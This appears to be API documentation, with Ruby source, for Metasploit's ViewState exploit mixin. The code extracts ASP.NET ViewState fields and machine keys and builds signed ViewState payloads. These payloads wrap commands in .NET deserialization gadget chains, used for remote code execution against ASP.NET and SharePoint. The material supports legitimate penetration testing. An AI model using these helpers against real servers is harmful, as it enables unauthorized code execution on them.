Module: Msf::Exploit::ViewState

Included in:
Remote::HTTP::Sharepoint
Defined in:
lib/msf/core/exploit/view_state.rb


Instance Method Details

#can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') ⇒ Boolean

Returns:

  • (Boolean)


# File 'lib/msf/core/exploit/view_state.rb', line 72

# Mixin wrapper around Rex::Exploit::ViewState.can_sign_viewstate?.
#
# All arguments are forwarded unchanged to the Rex implementation. If that
# call raises Rex::Exploit::ViewState::Error, the error class and message are
# reported through vprint_error and the method answers false instead of
# letting the exception propagate to the calling module.
#
# @param encoded_viewstate [Object] encoded ViewState, passed through as-is
# @param extra [String] forwarded as +extra:+ (defaults to '')
# @param algo [String] forwarded as +algo:+ (defaults to 'sha1')
# @param key [String] forwarded as +key:+ (defaults to '')
# @return [Boolean] the Rex result, or false when a ViewState error was raised
def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
  signing_options = { extra: extra, algo: algo, key: key }
  Rex::Exploit::ViewState.can_sign_viewstate?(encoded_viewstate, **signing_options)
rescue Rex::Exploit::ViewState::Error => e
  # A failed check is reported as "cannot sign", never as an exception.
  vprint_error("#{e.class.name}: #{e.message}")
  false
end

#decode_viewstate(encoded_viewstate, algo: 'sha1') ⇒ Object



# File 'lib/msf/core/exploit/view_state.rb', line 61

# Mixin wrapper around Rex::Exploit::ViewState.decode_viewstate.
#
# The decoded result is returned as received from Rex. When its +:data+ or
# +:hmac+ entry is not present, a verbose error is printed for that entry but
# the result is still returned, so callers must check both keys themselves.
# A Rex::Exploit::ViewState::Error is reported through vprint_error and
# replaced by a hash whose +:data+ and +:hmac+ are both nil.
#
# @param encoded_viewstate [Object] encoded ViewState, passed through as-is
# @param algo [String] forwarded as +algo:+ (defaults to 'sha1')
# @return [Hash] the Rex result, or +{ data: nil, hmac: nil }+ on a ViewState error
def decode_viewstate(encoded_viewstate, algo: 'sha1')
  result = Rex::Exploit::ViewState.decode_viewstate(encoded_viewstate, algo: algo)

  # Checked in this order so the data warning is always printed before the HMAC one.
  [
    [:data, 'Could not parse ViewState data'],
    [:hmac, 'Could not parse ViewState HMAC']
  ].each do |field, message|
    vprint_error(message) unless result[field].present?
  end

  result
rescue Rex::Exploit::ViewState::Error => e
  vprint_error("#{e.class.name}: #{e.message}")
  { data: nil, hmac: nil }
end

#extract_viewstate(html) ⇒ Object

Extract __VIEWSTATE from HTML



# File 'lib/msf/core/exploit/view_state.rb', line 80

# Read the value of the +__VIEWSTATE+ hidden input from a parsed HTML document.
#
# The lookup is an XPath query on the input whose +id+ is exactly
# "__VIEWSTATE"; only the first match returned by +at+ is used.
#
# @param html [#at] parsed document that answers +at+ with an XPath string
#   (presumably a Nokogiri document -- confirm against callers)
# @return [String, nil] the attribute text, or nil when no such input exists
def extract_viewstate(html)
  value_attribute = html.at('//input[@id = "__VIEWSTATE"]/@value')
  value_attribute&.text
end

#extract_viewstate_generator(html) ⇒ Object

Extract __VIEWSTATEGENERATOR from HTML



# File 'lib/msf/core/exploit/view_state.rb', line 85

# Read the value of the +__VIEWSTATEGENERATOR+ hidden input from a parsed
# HTML document.
#
# The lookup is an XPath query on the input whose +id+ is exactly
# "__VIEWSTATEGENERATOR"; only the first match returned by +at+ is used.
#
# @param html [#at] parsed document that answers +at+ with an XPath string
#   (presumably a Nokogiri document -- confirm against callers)
# @return [String, nil] the attribute text, or nil when no such input exists
def extract_viewstate_generator(html)
  generator_attribute = html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')
  generator_attribute&.text
end

#extract_viewstate_validation_key(web_config) ⇒ Object

Extract validationKey from web.config



# File 'lib/msf/core/exploit/view_state.rb', line 90

# Read the +validationKey+ attribute of the +machineKey+ element from a parsed
# web.config document.
#
# Only the first +machineKey+ element returned by +at+ is consulted.
#
# NOTE(review): validationKey is the secret ASP.NET uses to MAC ViewState, so
# a web.config from which this returns a value should be treated as a key
# disclosure and the key rotated.
#
# @param web_config [#at] parsed document that answers +at+ with an XPath
#   string (presumably a Nokogiri XML document -- confirm against callers)
# @return [String, nil] the attribute text, or nil when the attribute is absent
def extract_viewstate_validation_key(web_config)
  key_attribute = web_config.at('//machineKey/@validationKey')
  key_attribute&.text
end

#generate_viewstate(data, extra: '', algo: 'sha1', key: '') ⇒ Object



# File 'lib/msf/core/exploit/view_state.rb', line 53

# Mixin wrapper around Rex::Exploit::ViewState.generate_viewstate.
#
# Arguments are forwarded unchanged. Unlike the decode and can-sign wrappers
# in this mixin, no exception is rescued here, so any error raised by Rex
# propagates to the caller.
#
# @param data [Object] ViewState content, passed through as-is
# @param extra [String] forwarded as +extra:+ (defaults to '')
# @param algo [String] forwarded as +algo:+ (defaults to 'sha1')
# @param key [String] forwarded as +key:+ (defaults to '')
# @return [Object] whatever the Rex implementation returns
def generate_viewstate(data, extra: '', algo: 'sha1', key: '')
  signing_options = { extra: extra, algo: algo, key: key }
  Rex::Exploit::ViewState.generate_viewstate(data, **signing_options)
end

#generate_viewstate_hmac(data, algo: 'sha1', key: '') ⇒ Object



# File 'lib/msf/core/exploit/view_state.rb', line 57

# Mixin wrapper around Rex::Exploit::ViewState.generate_viewstate_hmac.
#
# Arguments are forwarded unchanged and no exception is rescued here.
#
# @param data [Object] the data to authenticate, passed through as-is
# @param algo [String] forwarded as +algo:+ (defaults to 'sha1')
# @param key [String] forwarded as +key:+ (defaults to '')
# @return [Object] whatever the Rex implementation returns
def generate_viewstate_hmac(data, algo: 'sha1', key: '')
  hmac_options = { algo: algo, key: key }
  Rex::Exploit::ViewState.generate_viewstate_hmac(data, **hmac_options)
end

#generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') ⇒ Object



# File 'lib/msf/core/exploit/view_state.rb', line 43

# Serialize +cmd+ with Msf::Util::DotNetDeserialization and wrap the result
# with #generate_viewstate.
#
# The gadget chain is read from the +DotNetGadgetChain+ datastore option and
# the formatter is fixed to +:LosFormatter+.
#
# NOTE(review): the option value is converted with +to_sym+ without a check
# here; this relies on the OptEnum registered in #initialize restricting it
# to the LosFormatter-compatible chains -- confirm that the option is always
# validated before this is reached.
#
# @param cmd [Object] passed as the first argument to
#   Msf::Util::DotNetDeserialization.generate
# @param extra [String] forwarded to #generate_viewstate (defaults to '')
# @param algo [String] forwarded to #generate_viewstate (defaults to 'sha1')
# @param key [String] forwarded to #generate_viewstate (defaults to '')
# @return [Object] the result of #generate_viewstate
def generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '')
  chain_name = datastore['DotNetGadgetChain'].to_sym
  serialized = Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: chain_name, formatter: :LosFormatter)

  generate_viewstate(serialized, extra: extra, algo: algo, key: key)
end

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/exploit/view_state.rb', line 27

# Set up the mixin and register its one advanced option.
#
# +super+ is called with the original arguments first. The option registered
# is the enum +DotNetGadgetChain+, whose choices come from
# Msf::Util::DotNetDeserialization.formatter_compatible_gadget_chains(:LosFormatter).
# The attribute array is, by the usual Msf option convention, required flag,
# description, default and permitted values -- here required, with
# +:TextFormattingRunProperties+ as the default.
#
# @param info [Hash] module information, handed to +super+ unchanged
def initialize(info = {})
  super

  permitted_chains = Msf::Util::DotNetDeserialization.formatter_compatible_gadget_chains(:LosFormatter)
  gadget_chain_option = OptEnum.new(
    'DotNetGadgetChain',
    [true, '.NET gadget chain to use in ViewState', :TextFormattingRunProperties, permitted_chains]
  )

  register_advanced_options([gadget_chain_option])
end

#pack_viewstate_generator(hex_generator) ⇒ Object

Convenience method to convert __VIEWSTATEGENERATOR to binary



# File 'lib/msf/core/exploit/view_state.rb', line 95

# Convert a hexadecimal +__VIEWSTATEGENERATOR+ value to its packed binary form.
#
# The value is parsed as base 16 and packed with the 'V' directive, i.e. as a
# 32-bit unsigned integer in little-endian byte order.
#
# NOTE(review): String#to_i never raises -- input with no leading hex digits
# parses as 0 and trailing non-hex characters are ignored, so a malformed
# generator is packed silently. A nil argument (for example a missing field
# from #extract_viewstate_generator) raises NoMethodError.
#
# @param hex_generator [String] hexadecimal text (assumed to be a String)
# @return [String] four packed bytes
def pack_viewstate_generator(hex_generator)
  generator_value = hex_generator.to_i(16)
  [generator_value].pack('V')
end

#pack_viewstate_validation_key(hex_key) ⇒ Object

Convenience method to convert validationKey to binary



# File 'lib/msf/core/exploit/view_state.rb', line 100

# Convert a hexadecimal +validationKey+ string to its packed binary form.
#
# Uses the 'H*' pack directive: each pair of hex digits becomes one byte,
# high nibble first. An odd number of digits is padded with a zero low
# nibble in the final byte.
#
# @param hex_key [String] hexadecimal key text
# @return [String] the packed bytes (half as many as hex digits, rounded up)
def pack_viewstate_validation_key(hex_key)
  hex_fields = [hex_key]
  hex_fields.pack('H*')
end